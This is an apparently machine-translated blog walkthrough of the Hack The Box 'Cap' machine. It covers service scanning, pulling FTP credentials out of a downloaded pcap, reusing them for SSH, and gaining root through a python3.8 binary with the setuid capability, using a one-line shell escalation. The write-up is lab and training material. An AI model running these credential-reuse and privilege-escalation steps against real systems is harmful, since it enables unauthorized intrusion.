current position:Home>[HTB] cap (datagram analysis, setuid capability: Python)

[HTB] cap (datagram analysis, setuid capability: Python)

2022-02-01 15:20:49 Antenna pot


The host penetrated by this article is legally authorized . The tools and methods used in this article are limited to learning and communication , Please do not use the tools and ideas used in this article for any illegal purpose , All consequences of this , I am not responsible for , Nor shall it be responsible for any misuse or damage caused .

Service detection

└─# nmap -sV -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-11-28 08:33 EST
Nmap scan report for
Host is up (0.35s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

 Copy code 

Service enumeration analysis

ftp Anonymous login is not allowed

Nothing was found in the blasting catalogue

80 Service opening is a background like network management ( No need to log in ), It shows three columns corresponding to ifconfig,netstat And intercept Traffic Services ( You can download the target pcap file )

It seems that the main attack point is 80 port

The user name in the background is :nathan

stay This page every 5 One second will update pcap file , You can download the latest file at the current time , The cycle range is 1-5

But the files with login information are hidden in 0 In Document No , That is to say

Isn't surprise , No surprise ?

The first 0 individual pcap Download the file locally , use wireshark open

The first 36 Datagrams found ftp user name :nathan

The first 40 Datagrams found ftp password :{ Not tell you }

Sign in ftp

└─# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( nathan
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null
-r--------    1 1001     1001           33 Nov 28 15:32 user.txt
226 Directory send OK.

 Copy code 

We successfully logged in to ftp, Seems to be nathan User home Catalog , See that there is user.txt, But we don't have permission to read .

initial shell

Many lazy administrators are used to using the same login information for various services , Try to login to with the login credentials above ssh

└─# ssh [email protected]                                       
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sun Nov 28 16:00:07 UTC 2021

  System load:  0.0               Processes:             225
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0:
  Swap usage:   0%

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from
[email protected]:~$ pwd
[email protected]:~$ ls 

 Copy code 

Get user.txt

Raise the right

Pass on linpea, Find out python Yes setuid The ability of

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
 Copy code 

use python Raise the right

[email protected]:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id       
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# whoami

 Copy code 

copyright notice
author[Antenna pot],Please bring the original link to reprint, thank you.

Random recommended